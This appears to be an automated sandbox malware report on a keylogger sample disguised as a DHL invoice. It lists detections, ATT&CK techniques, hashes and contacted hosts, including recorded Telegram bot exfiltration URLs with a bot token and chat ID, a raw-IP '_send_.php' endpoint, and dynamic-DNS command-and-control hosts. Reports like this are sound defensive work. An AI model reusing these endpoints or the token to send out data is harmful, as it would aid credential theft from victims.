Source: Yara match; File source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.DHL DOC INV 191224.gz.exe.dc0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.DHL DOC INV 191224.gz.exe.dc0000.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000000.00000002.2053416462.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.4475356588.00000000031A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.4474302857.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: DHL DOC INV 191224.gz.exe PID: 2612, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: RegSvcs.exe PID: 6608, type: MEMORYSTR
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe; Code function: 0_2_003B1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_003B1204
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe; Code function: 0_2_003B1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_003B1806
MITRE ATT&CK Matrix (one line per tactic; a number in parentheses is the report's match count for that technique)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
Initial Access: Valid Accounts (2); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
Execution: Native API (1); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
Persistence: DLL Side-Loading (1); Valid Accounts (2); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Privilege Escalation: Exploitation for Privilege Escalation (1); DLL Side-Loading (1); Valid Accounts (2); Access Token Manipulation (21); Process Injection (212); RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Defense Evasion: Disable or Modify Tools (11); Deobfuscate/Decode Files or Information (11); Obfuscated Files or Information (31); DLL Side-Loading (1); Valid Accounts (2); Virtualization/Sandbox Evasion (111); Access Token Manipulation (21); Process Injection (212); HTML Smuggling; Dynamic API Resolution
Credential Access: OS Credential Dumping (1); Input Capture (21); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
Discovery: System Time Discovery (2); Account Discovery (1); File and Directory Discovery (1); System Information Discovery (126); Security Software Discovery (221); Virtualization/Sandbox Evasion (111); Process Discovery (2); Application Window Discovery (11); System Owner/User Discovery (1); System Network Configuration Discovery (1)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
Collection: Archive Collected Data (11); Data from Local System (1); Input Capture (21); Clipboard Data (3); Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
Command and Control: Web Service (1); Ingress Tool Transfer (4); Encrypted Channel (11); Non-Application Layer Protocol (4); Application Layer Protocol (15); Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement

Source | Detection | Scanner | Label
DHL DOC INV 191224.gz.exe | 47% | Virustotal |
DHL DOC INV 191224.gz.exe | 74% | ReversingLabs | Win32.Spyware.Snakekeylogger
DHL DOC INV 191224.gz.exe | 100% | Joe Sandbox ML |
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
reallyfreegeoip.org | 188.114.97.3 | true | false | | high
api.telegram.org | 149.154.167.220 | true | false | | high
checkip.dyndns.com | 193.122.130.0 | true | false | | high
checkip.dyndns.org | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://reallyfreegeoip.org/xml/8.46.123.189 | false | | high
https://api.telegram.org/bot7289689475:AAGFe7RPg26YJkJcwIEyxRK_I9DsBw4teZU/sendDocument?chat_id=7360475312&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery | false | | high
http://checkip.dyndns.org/ | false | | high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:642294%0D%0ADate%20and%20Time:%2004/01/2025%20/%2001:55:27%0D%0ACountry%20Name:%20%0D%0A%5B%20642294%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://www.office.com/ | RegSvcs.exe, 00000002.00000002.4475356588.0000000003289000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475356588.000000000327A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:642294%0D%0ADate%20a | RegSvcs.exe, 00000002.00000002.4475356588.0000000003186000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/chrome_newtab | RegSvcs.exe, 00000002.00000002.4476505494.00000000040C1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | RegSvcs.exe, 00000002.00000002.4476505494.00000000040C1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org | RegSvcs.exe, 00000002.00000002.4475356588.00000000031A5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475356588.0000000003186000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | RegSvcs.exe, 00000002.00000002.4476505494.00000000040C1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot | RegSvcs.exe, 00000002.00000002.4475356588.00000000031A5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475356588.0000000003186000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4474302857.0000000000402000.00000040.80000000.00040000.00000000.sdmp | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | RegSvcs.exe, 00000002.00000002.4476505494.00000000040C1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://checkip.dyndns.org | RegSvcs.exe, 00000002.00000002.4475356588.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475356588.0000000003186000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | RegSvcs.exe, 00000002.00000002.4476505494.00000000040C1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://chrome.google.com/webstore?hl=enlBsq | RegSvcs.exe, 00000002.00000002.4475356588.0000000003253000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot/sendMessage?chat_id=&text= | RegSvcs.exe, 00000002.00000002.4475356588.0000000003186000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://chrome.google.com/webstore?hl=en | RegSvcs.exe, 00000002.00000002.4475356588.0000000003258000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475356588.0000000003249000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.ecosia.org/newtab/ | RegSvcs.exe, 00000002.00000002.4476505494.00000000040C1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://varders.kozow.com:8081 | DHL DOC INV 191224.gz.exe, 00000000.00000002.2053416462.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475356588.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4474302857.0000000000402000.00000040.80000000.00040000.00000000.sdmp | false | | high
https://api.telegram.org/bot7289689475:AAGFe7RPg26YJkJcwIEyxRK_I9DsBw4teZU/sendDocument?chat_id=7360 | RegSvcs.exe, 00000002.00000002.4475356588.00000000031A5000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://aborters.duckdns.org:8081 | DHL DOC INV 191224.gz.exe, 00000000.00000002.2053416462.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475356588.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4474302857.0000000000402000.00000040.80000000.00040000.00000000.sdmp | false | | high
https://ac.ecosia.org/autocomplete?q= | RegSvcs.exe, 00000002.00000002.4476505494.00000000040C1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://51.38.247.67:8081/_send_.php?L | RegSvcs.exe, 00000002.00000002.4475356588.00000000031A5000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://chrome.google.com/webstore?hl=en( | RegSvcs.exe, 00000002.00000002.4475356588.0000000003249000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://anotherarmy.dns.army:8081 | DHL DOC INV 191224.gz.exe, 00000000.00000002.2053416462.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475356588.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4474302857.0000000000402000.00000040.80000000.00040000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | RegSvcs.exe, 00000002.00000002.4476505494.00000000040C1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://checkip.dyndns.org/q | DHL DOC INV 191224.gz.exe, 00000000.00000002.2053416462.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4474302857.0000000000402000.00000040.80000000.00040000.00000000.sdmp | false | | high
https://www.office.com/lBsq | RegSvcs.exe, 00000002.00000002.4475356588.0000000003284000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://reallyfreegeoip.org/xml/8.46.123.189$ | RegSvcs.exe, 00000002.00000002.4475356588.000000000315E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475356588.0000000003118000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475356588.0000000003186000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://reallyfreegeoip.org | RegSvcs.exe, 00000002.00000002.4475356588.00000000030EE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475356588.000000000315E000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.office.com/( | RegSvcs.exe, 00000002.00000002.4475356588.000000000327A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://api.telegram.org | RegSvcs.exe, 00000002.00000002.4475356588.00000000031D5000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | RegSvcs.exe, 00000002.00000002.4475356588.00000000030A1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | RegSvcs.exe, 00000002.00000002.4476505494.00000000040C1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded | DHL DOC INV 191224.gz.exe, 00000000.00000002.2053416462.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4474302857.0000000000402000.00000040.80000000.00040000.00000000.sdmp | false | | high
https://reallyfreegeoip.org/xml/ | DHL DOC INV 191224.gz.exe, 00000000.00000002.2053416462.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475356588.00000000030EE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4474302857.0000000000402000.00000040.80000000.00040000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
188.114.97.3 | reallyfreegeoip.org | European Union | 13335 | CLOUDFLARENETUS | false
193.122.130.0 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1583321
Start date and time: 2025-01-02 13:44:09 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 40s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
                                                                                                  Technologies:
                                                                                                  • HCA enabled
                                                                                                  • EGA enabled
                                                                                                  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: DHL DOC INV 191224.gz.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@3/2@3/3
                                                                                                  EGA Information:
                                                                                                  • Successful, ratio: 50%
                                                                                                  HCA Information:
                                                                                                  • Successful, ratio: 99%
                                                                                                  • Number of executed functions: 50
                                                                                                  • Number of non-executed functions: 294
                                                                                                  Cookbook Comments:
                                                                                                  • Found application associated with file extension: .exe
                                                                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                  • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.45
                                                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                  • Execution Graph export aborted for target RegSvcs.exe, PID 6608 because it is empty
                                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
07:45:08 | API Interceptor | 9694300x Sleep call for process: RegSvcs.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
149.154.167.220 | mcgen.exe | malicious | Blank Grabber |
149.154.167.220 | eP6sjvTqJa.exe | malicious | DCRat, PureLog Stealer, zgRAT |
149.154.167.220 | YGk3y6Tdix.exe | malicious | DCRat, PureLog Stealer, zgRAT |
149.154.167.220 | Etqq32Yuw4.exe | malicious | DCRat, PureLog Stealer, zgRAT |
149.154.167.220 | vEtDFkAZjO.exe | malicious | RL STEALER, StormKitty |
149.154.167.220 | Invoice-BL. Payment TT $ 28,945.99.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer |
149.154.167.220 | file.exe | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | XClient.exe | malicious | XWorm |
149.154.167.220 | Requested Documentation.exe | malicious | MassLogger RAT, PureLog Stealer |
149.154.167.220 | iviewers.dll | malicious | LummaC |
188.114.97.3 | dGhlYXB0Z3JvdXA=-free.exe | malicious | Unknown | /api/get/free
188.114.97.3 | dGhlYXB0Z3JvdXA=-free.exe | malicious | Unknown | /api/get/free
188.114.97.3 | RFQ 3100185 MAHAD.exe | malicious | FormBook | www.rgenerousrs.store/o362/
188.114.97.3 | A2028041200SD.exe | malicious | FormBook | www.beylikduzu616161.xyz/2nga/
188.114.97.3 | Delivery_Notification_00000260791.doc.js | malicious | Unknown | radostdetym.ru/?ad=1JXSXybzEjjRJQDbVngTy7d8kEFAxmgmDN&id=rWoA9pTQhV1o4c5fjbOa-d26BGh3QU3-Bk0PqI4WnzM-5vl4IqKPymhrqkRpunF_PTHktMR-2qUlNAtnXA&rnd=45
188.114.97.3 | ce.vbs | malicious | Unknown | paste.ee/d/lxvbq
188.114.97.3 | Label_00000852555.doc.js | malicious | Unknown | tamilandth.com/counter/?ad=1GNktTwWR98eDEMovFNDqyUPsyEdCxKRzC&id=LWkA9pJQhl9uXU1kaDN-eSC-55GNxzVDsLXZhtXL8Pr1j1FTCf4XAYGxA0VCjCQra2XwotFrDHGSYxM&rnd=25
188.114.97.3 | PO 20495088.exe | malicious | FormBook | www.ssrnoremt-rise.sbs/3jsc/
188.114.97.3 | QUOTATION_NOVQTRA071244#U00faPDF.scr.exe | malicious | Snake Keylogger | filetransfer.io/data-package/zWkbOqX7/download
188.114.97.3 | http://kklk16.bsyo45ksda.top | malicious | Unknown | kklk16.bsyo45ksda.top/favicon.ico
Match | Associated Sample Name / URL | Detection | Threat Name | Context
reallyfreegeoip.org | file.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
reallyfreegeoip.org | PO_2024_056209_MQ04865_ENQ_1045.exe | malicious | MassLogger RAT, PureLog Stealer | 188.114.96.3
reallyfreegeoip.org | PO_KB#67897.cmd | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | 188.114.97.3
reallyfreegeoip.org | Requested Documentation.exe | malicious | MassLogger RAT, PureLog Stealer | 188.114.96.3
reallyfreegeoip.org | Dotc67890990.exe | malicious | Snake Keylogger | 104.21.67.152
reallyfreegeoip.org | INQUIRY.exe | malicious | MassLogger RAT, PureLog Stealer | 172.67.177.134
reallyfreegeoip.org | Technonomic.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 172.67.177.134
reallyfreegeoip.org | HALKBANK EKSTRE.exe | malicious | MassLogger RAT | 172.67.177.134
reallyfreegeoip.org | EPIRTURMEROOO0060.exe | malicious | MassLogger RAT | 172.67.177.134
reallyfreegeoip.org | Proforma Invoice.exe | malicious | MassLogger RAT | 104.21.67.152
checkip.dyndns.com | file.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.6.168
checkip.dyndns.com | PO_2024_056209_MQ04865_ENQ_1045.exe | malicious | MassLogger RAT, PureLog Stealer | 132.226.8.169
checkip.dyndns.com | PO_KB#67897.cmd | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | 193.122.130.0
checkip.dyndns.com | Requested Documentation.exe | malicious | MassLogger RAT, PureLog Stealer | 132.226.247.73
checkip.dyndns.com | ZOYGRL1ePa.exe | malicious | Agent Tesla, AgentTesla | 158.101.44.242
checkip.dyndns.com | Dotc67890990.exe | malicious | Snake Keylogger | 132.226.247.73
checkip.dyndns.com | INQUIRY.exe | malicious | MassLogger RAT, PureLog Stealer | 193.122.6.168
checkip.dyndns.com | Technonomic.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 193.122.6.168
checkip.dyndns.com | HALKBANK EKSTRE.exe | malicious | MassLogger RAT | 193.122.6.168
checkip.dyndns.com | EPIRTURMEROOO0060.exe | malicious | MassLogger RAT | 193.122.6.168
api.telegram.org | mcgen.exe | malicious | Blank Grabber | 149.154.167.220
api.telegram.org | eP6sjvTqJa.exe | malicious | DCRat, PureLog Stealer, zgRAT | 149.154.167.220
api.telegram.org | YGk3y6Tdix.exe | malicious | DCRat, PureLog Stealer, zgRAT | 149.154.167.220
api.telegram.org | Etqq32Yuw4.exe | malicious | DCRat, PureLog Stealer, zgRAT | 149.154.167.220
api.telegram.org | vEtDFkAZjO.exe | malicious | RL STEALER, StormKitty | 149.154.167.220
api.telegram.org | Invoice-BL. Payment TT $ 28,945.99.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer | 149.154.167.220
api.telegram.org | file.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | XClient.exe | malicious | XWorm | 149.154.167.220
api.telegram.org | Requested Documentation.exe | malicious | MassLogger RAT, PureLog Stealer | 149.154.167.220
api.telegram.org | iviewers.dll | malicious | LummaC | 149.154.167.220
Match | Associated Sample Name / URL | Detection | Threat Name | Context
TELEGRAMRU | mcgen.exe | malicious | Blank Grabber | 149.154.167.220
TELEGRAMRU | eP6sjvTqJa.exe | malicious | DCRat, PureLog Stealer, zgRAT | 149.154.167.220
TELEGRAMRU | YGk3y6Tdix.exe | malicious | DCRat, PureLog Stealer, zgRAT | 149.154.167.220
TELEGRAMRU | CenteredDealing.exe | malicious | Vidar | 149.154.167.99
TELEGRAMRU | CenteredDealing.exe | malicious | Vidar | 149.154.167.99
TELEGRAMRU | Etqq32Yuw4.exe | malicious | DCRat, PureLog Stealer, zgRAT | 149.154.167.220
TELEGRAMRU | over.ps1 | malicious | Vidar | 149.154.167.99
TELEGRAMRU | MatAugust.exe | malicious | Vidar | 149.154.167.99
TELEGRAMRU | vEtDFkAZjO.exe | malicious | RL STEALER, StormKitty | 149.154.167.220
TELEGRAMRU | Invoice-BL. Payment TT $ 28,945.99.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer | 149.154.167.220
CLOUDFLARENETUS | MDE_File_Sample_017466bb6ff6d1b5b887f00b4b0a959ffc026bdb.zip | malicious | Unknown | 104.21.2.160
CLOUDFLARENETUS | MDE_File_Sample_017466bb6ff6d1b5b887f00b4b0a959ffc026bdb.zip | malicious | Unknown | 104.21.2.160
CLOUDFLARENETUS | MDE_File_Sample_017466bb6ff6d1b5b887f00b4b0a959ffc026bdb.zip | malicious | Unknown | 104.21.2.160
CLOUDFLARENETUS | https://www.ecorfan.org/ | malicious | Unknown | 104.17.24.14
CLOUDFLARENETUS | https://debeeyardelia.pages.dev | malicious | Unknown | 188.114.96.3
CLOUDFLARENETUS | Setup.exe.7z | malicious | Unknown | 172.64.41.3
CLOUDFLARENETUS | http://www.johnlewis-partnerships.com | malicious | Unknown | 104.18.43.2
CLOUDFLARENETUS | https://gldkzr-lpqw.buzz/script/ut.js?cb%5C=1735764124690 | malicious | Unknown | 104.21.0.170
CLOUDFLARENETUS | 1.ps1 | malicious | CobaltStrike, Metasploit | 104.21.96.1
CLOUDFLARENETUS | random(4).exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | 172.67.129.178
ORACLE-BMC-31898US | Hilix.mips.elf | malicious | Mirai | 140.238.15.187
ORACLE-BMC-31898US | file.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.6.168
ORACLE-BMC-31898US | PO_KB#67897.cmd | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | 193.122.130.0
ORACLE-BMC-31898US | ZOYGRL1ePa.exe | malicious | Agent Tesla, AgentTesla | 158.101.44.242
ORACLE-BMC-31898US | INQUIRY.exe | malicious | MassLogger RAT, PureLog Stealer | 193.122.6.168
ORACLE-BMC-31898US | armv4l.elf | malicious | Mirai | 129.148.142.134
ORACLE-BMC-31898US | Technonomic.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 193.122.6.168
ORACLE-BMC-31898US | HALKBANK EKSTRE.exe | malicious | MassLogger RAT | 193.122.6.168
ORACLE-BMC-31898US | splm68k.elf | malicious | Unknown | 129.147.168.111
ORACLE-BMC-31898US | EPIRTURMEROOO0060.exe | malicious | MassLogger RAT | 193.122.6.168
Match | Associated Sample Name / URL | Detection | Threat Name | Context
54328bd36c14bd82ddaa0c04b25ed9ad | NL Hybrid.exe | malicious | Titanium Proxy, PureLog Stealer | 188.114.97.3
54328bd36c14bd82ddaa0c04b25ed9ad | NL Hybrid.exe | malicious | Titanium Proxy, PureLog Stealer | 188.114.97.3
54328bd36c14bd82ddaa0c04b25ed9ad | file.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
54328bd36c14bd82ddaa0c04b25ed9ad | PO_2024_056209_MQ04865_ENQ_1045.exe | malicious | MassLogger RAT, PureLog Stealer | 188.114.97.3
54328bd36c14bd82ddaa0c04b25ed9ad | RtU8kXPnKr.exe | malicious | Quasar | 188.114.97.3
54328bd36c14bd82ddaa0c04b25ed9ad | PO_KB#67897.cmd | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | 188.114.97.3
54328bd36c14bd82ddaa0c04b25ed9ad | Requested Documentation.exe | malicious | MassLogger RAT, PureLog Stealer | 188.114.97.3
54328bd36c14bd82ddaa0c04b25ed9ad | Dotc67890990.exe | malicious | Snake Keylogger | 188.114.97.3
54328bd36c14bd82ddaa0c04b25ed9ad | INQUIRY.exe | malicious | MassLogger RAT, PureLog Stealer | 188.114.97.3
54328bd36c14bd82ddaa0c04b25ed9ad | Technonomic.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 188.114.97.3
3b5074b1b5d032e5620f69f9f700ff0e | NOTIFICATION_OF_DEPENDANTS_1.vbs | malicious | Xmrig | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | CRf9KBk4ra.exe | malicious | DCRat | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | 7FEGBYFBHFBJH32.exe | malicious | 44Caliber Stealer, BlackGuard, Rags Stealer | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | test.doc.bin.doc | malicious | Unknown | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | web44.mp4.hta | malicious | LummaC | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | test.doc.bin.doc | malicious | Unknown | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | eP6sjvTqJa.exe | malicious | DCRat, PureLog Stealer, zgRAT | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | YGk3y6Tdix.exe | malicious | DCRat, PureLog Stealer, zgRAT | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | 1.ps1 | malicious | Unknown | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | Let's_20Compress.exe | malicious | Unknown | 149.154.167.220
                                                                                                                      No context
Process: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe
File Type: data
Category: dropped
Size (bytes): 122774
Entropy (8bit): 7.948058457170821
Encrypted: false
SSDEEP: 3072:34ULfSx0QTR6i/SYrVclLIzll0XHYq555vwg:34IqxzMink8soqP5v5
MD5: EC65F2BA51C5109595631773EDB2D910
SHA1: E5A575835A3C580529279D09F10CC8558AC28F3D
SHA-256: 5E85CF36C1C16DE3B973C5B96953C4EB84738B1EB669E1574379CFFA46774281
SHA-512: FFE6A7FB9538EB6FF0DE1A198FBA7F8D33E2D9A09DDFFCEE707CC79F972F8D9B77BBDDC5600ABF722F84992212D384BC8ABCAC76FBDCF7F4C52E58C18C93491F
Malicious: false
Reputation: low
Process: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe
File Type: data
Category: dropped
Size (bytes): 237056
Entropy (8bit): 6.941867658049194
Encrypted: false
SSDEEP: 3072:BICnXmLIzYsMS/4qvpDilYFCYkdKF+z2FHbZ/Rgj1:BdnGIssMStilukdC+z2Ft/Ri
MD5: AB0A62D1936E325759037B0BB688D410
SHA1: 9D1EAA5C5A777228710FEF15DCACABD1255CDA8B
SHA-256: 3937AA06834339FB58CAF1BFCC4268F251EA848ABBA692F306C0A8C4DF787C3B
SHA-512: DF4B72B60FFA362F459A784B7C43C5E26DD5D4FDDF2697D039F2D4D7F9FC9BEA24790D3F9CBC23C0974A9CF08FD1BF6FBBEEBA4B73B591AB08869213B468494D
Malicious: false
Reputation: low
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 6.951110925423519
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: DHL DOC INV 191224.gz.exe
File size: 1'106'432 bytes
MD5: 49a44e1bd7ae31824843c4316f35eb35
SHA1: 29ca56d04c4d089d7aa30df2d3480988da425fc0
SHA256: 9ea5173104481c6538cb5fcdadc74682b3d422750039ab3311afe694e59b4602
SHA512: c7e88ce41dd529f69d5a9aeb0d6a87fff85872215eb92815a67eb4b6533ff19a0e985572185b1ebda374635684ac8a1a7cde7737e780676ebb09f4d9aa98c600
SSDEEP: 24576:SqDEvCTbMWu7rQYlBQcBiT6rprG8aThZqa2nU5:STvC/MTQYxsWR7aTd2
TLSH: 0535BF0273D1C062FFAB92334B5AF6515BBC69260123E61F13981D7ABE701B1563E7A3
File Content Preview: MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....
Icon Hash: aaf3e3e3938382a0
Entrypoint: 0x420577
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x67636BC0 [Thu Dec 19 00:41:36 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
